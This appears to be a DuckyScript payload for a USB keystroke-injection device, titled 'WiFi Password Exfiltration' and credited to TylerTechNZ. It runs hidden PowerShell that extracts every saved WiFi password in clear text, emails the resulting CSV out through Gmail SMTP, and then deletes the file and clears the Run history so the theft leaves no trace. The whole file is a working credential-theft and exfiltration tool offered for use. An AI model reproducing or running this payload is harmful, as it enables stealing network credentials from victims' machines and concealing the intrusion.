/
WiFi Password Exfiltration
54 lines (54 loc) · 2.03 KB
/
WiFi Password Exfiltration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
REM
REM _______ _ _______ _
REM |__ __| | | |__ __| | |
REM | |_ _| | ___ _ __| | ___ ___| |__
REM | | | | | |/ _ \ '__| |/ _ \/ __| '_ \
REM | | |_| | | __/ | | | __/ (__| | | |
REM |_|\__, |_|\___|_| |_|\___|\___|_| |_|
REM __/ |
REM |___/
REM
REM Password Stealing script by TylerTechNZ
REM
REM --> Create Obfuscated CMD
DELAY 2000
WINDOWS r
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING MODE 20,1
ENTER
DELAY 200
STRING COLOR FE
ENTER
REM --> Start Powershell, get all WiFi passwords and Export to CSV
DELAY 200
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "(netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\W+\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Export-Csv temp.csv"
ENTER
REM --> Wait a couple of seconds and start a new Obfuscated CMD
DELAY 3000
WINDOWS r
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING MODE 20,1
ENTER
DELAY 200
STRING COLOR FE
ENTER
DELAY 200
REM --> Email CSV via GMAIL
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "$SMTPInfo = New-Object Net.Mail.SmtpClient('smtp.gmail.com', 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('SENDEREMAIL', 'SENDERPASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'SENDEREMAIL'; $ReportEmail.To.Add('RECIEVEREMAIL'); $ReportEmail.Subject = 'Wifi Report'; $ReportEmail.Body = 'Attached is your wifi report.'; $ReportEmail.Attachments.Add('temp.csv'); $SMTPInfo.Send($ReportEmail)"
ENTER
REM --> Then cover your tracks. You were never here.
DELAY 500
STRING del temp.csv
ENTER
DELAY 500
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
DELAY 500
STRING exit
ENTER